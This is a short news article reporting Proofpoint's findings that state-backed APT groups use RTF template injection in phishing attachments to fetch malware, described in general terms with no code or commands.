Last Updated on 07/12/2021 by Nidhi Khandelwal
Hacking groups supported by nation states are using a simple but powerful new technology to power phishing efforts in order to spread malware and steal information of interest to their governments.
Advanced persistent threat (APT) groups acting on behalf of Russian, Chinese, and Indian interests, according to Proofpoint researchers, are exploiting rich text format (RTF) template injections.
VPN services that are the bestThe most effective security keysAntivirus software that works bestVPNs with the fastest speeds
While the use of RTF text file attachments in phishing emails isn’t new, the technique used by hackers is easier to deploy and more effective because antivirus software has a harder time detecting them – and many organisations won’t block RTF files by default because they’re used in daily business operations.
RTF template injection is the method. It’s possible for attackers to weaponize an RTF file by changing its document-formatting attributes to request remote content from a URL controlled by the attackers, allowing them to discreetly retrieve a malware payload and install it on the victim’s PC.
Attackers can utilize RTF template injections to open documents in Microsoft Word, which will retrieve the payload via the malicious URL while also displaying the fake document in Word.
This strategy may include persuading users into permitting editing or allowing material to begin the process of downloading the payload, but with the correct kind of social engineering, especially if accompanied by a persuasive bait, a victim can be duped into allowing this to happen.
It’s not a complicated approach, but because it’s so easy to use and reliable, it’s grown popular with various nation-state hacking operations, which can utilize RTF attacks instead of more complex ones to get the same effects.
Despite the “Advanced” label, APT actors will use the least amount of resources and sophistication to get access to organisations, according to Sherrod DeGrippo, vice president of Proofpoint’s threat research and detection.
